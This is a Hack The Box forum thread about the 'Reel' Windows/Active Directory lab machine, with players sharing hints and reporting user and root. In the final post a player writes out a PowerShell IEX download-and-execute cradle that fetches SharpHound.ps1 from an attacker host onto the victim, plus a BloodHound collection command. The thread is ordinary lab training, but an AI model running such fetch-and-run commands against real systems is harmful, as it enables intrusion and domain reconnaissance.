Reel

1235»

Comments

  • Got user. Loving this machine so far!

    Arrexel

  • Already got user.
    I was just wondering if someone was able to get user without using ms?

    Hack The Box

    OSCE | OSCP | CRTE | GPEN | eCPTX | CREST CRT | GDAT | eCPPTv2 | GWAPT | OSWP | ECSA (Practical)

  • Was busy with OSCP, but had a moment to do this and it was elaborate!

    cslatt05

  • edited October 2018

    failed many times to get proper payload and finally got user!
    and now stuck with priv sec user t**
    i'm new with windows, but this is an interesting box, any help with priv esc appreciated :)

  • Got ROOT! yeah!
    One of the best machines. Learned a lot about windows way of "rule them all". Breaking head through the wall, trying to use powershell, because forget about initial nmap results. I'll get it another one time a week later after reading some articles from blackhat 17, to remember everything better. Thank you @egre55

  • Hi all... I have user, and I know where to go next, but am having some trouble getting there... I don't know if it's meterpreter or what, but my PS commands seem to run without response. Would appreciate a nudge in the right direction.

  • init foothold: im trying to send a file based on the tips on the machine to an user but i dont get anything back is this the intended way?

  • edited November 2018

    I am soooooo close on this. I can see the file I want, but I can't open it, copy it, move it or change it's properties... What am I missing?

    Edit: Nevermind! I'm a fool. I need to slow down and read a little more carefully.

    Got root! Great box!

  • powershell issue is solved by issuing "powershell -c -" in meterpreter > shell

  • Awesome machine.
    Incredibly realistic too.

  • Where to start? Downloaded some files and whats the next step? PM plz
    Hack The Box

  • Got root! If you want to learn a lot about windows AD PrivEsc this is your machine!

    laed2

  • Very sad to see that this box is retiring this weekend.

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • This system is an crazy walk down AD road. Learned loads.

  • edited November 2018
    <<< redacted - rooted!!! >>>
  • @rireoubli said:
    Yay, finally got root on this one as well! It was a very good one, thanks to the creator.

    And I'd like to share the hint that made it for me when I was stuck for so long: login-logout might help you

    Thank you, thank you, thank you.

    alt text

  • edited November 2018

    <<< redacted - rooted!!! >>>

  • @evandrix said:
    stuck on #reel @ user c****e, what next?
    1. need to re-run "dog" tool, or output already there is sufficient to PE?
    2. PE to local admin sufficient, or must be da?
    3. maybe my ps1 syntax is wrong, if someone can help (in a pm probably), that would be great

    You dont need to re-run anything. The document you have is enough.

    This is a useful read: https://wald0.com/?p=112

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • edited November 2018

    <<< redacted - rooted!!! >>>

  • @evandrix said:
    yep, i've read through that.
    it seems like the "document you have" != the output of my live ps1 queries via p****v**w

    Possibly, but if you've logged in as the user C*, did you enumerate the user T* account first?

    Note: I am not going to be available much in September.

    TazWake

    Note: https://www.nohello.com/

    Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I cant help. This isn't Twitter so my DMs are always open.

  • edited November 2018

    Rooted thanks to a hint to stop being a dummy . I'm sad to see this one go into retirement.

    This was a great box and representative of cracking the perimeter into a real world environment. I definitely added some cool techniques and tools into my arsenal thanks to this challenge.

    If any HTB users have helped you with a challenge or hint please consider giving them +respect on their profile.
    Here is mine is you would like to do so.
    https://www.hackthebox.eu/home/users/profile/50326

  • edited November 2018
    <<< redacted - rooted!!! >>>
  • edited November 2018

    <<< redacted - rooted!!! >>>

  • @whipped said:

    @rireoubli said:
    Yay, finally got root on this one as well! It was a very good one, thanks to the creator.

    And I'd like to share the hint that made it for me when I was stuck for so long: login-logout might help you

    Thank you, thank you, thank you.

    Thank you, thank you, thank you,Thank you, thank you, thank you.

  • hey all,
    I know that this machine is old and just for the sake of education

    I have reached the part where i download SharpHound.ps1 on victim using
    IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/SharpHound.ps1')

    Then when i
    Invoke-BloodHound -CollectionMethod All

    the shell hangs and nothing happens

    any help on what may be causing the problem

Sign In to comment.